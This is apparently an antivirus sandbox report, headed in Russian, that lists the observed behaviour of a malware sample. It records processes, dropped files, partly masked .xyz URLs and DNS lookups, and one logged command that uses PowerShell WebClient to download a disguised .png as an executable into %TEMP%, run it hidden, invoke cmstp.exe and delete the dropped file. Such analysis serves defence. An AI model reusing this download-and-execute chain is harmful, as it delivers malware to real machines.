Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/gold/wheatstag.png','%TEMP%\wheatstag.exe');%TEMP%\wheatstag.exe
- %WINDIR%\explorer.exe
- iexplore.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\hc2.exe
- %TEMP%\wheatstag.exe
- %TEMP%\wheatstag.exe
- http://www.az##p.xyz/gold/wheatstag.png
- http://bz##p.xyz/cream/stag.bin
- DNS ASK az##p.xyz
- DNS ASK bz##p.xyz
- '%TEMP%\wheatstag.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.az##p.xyz/gold/wheatstag.png','%TEMP%\wheatstag.exe');%TEMP%\wheatstag.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmstp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\wheatstag.exe"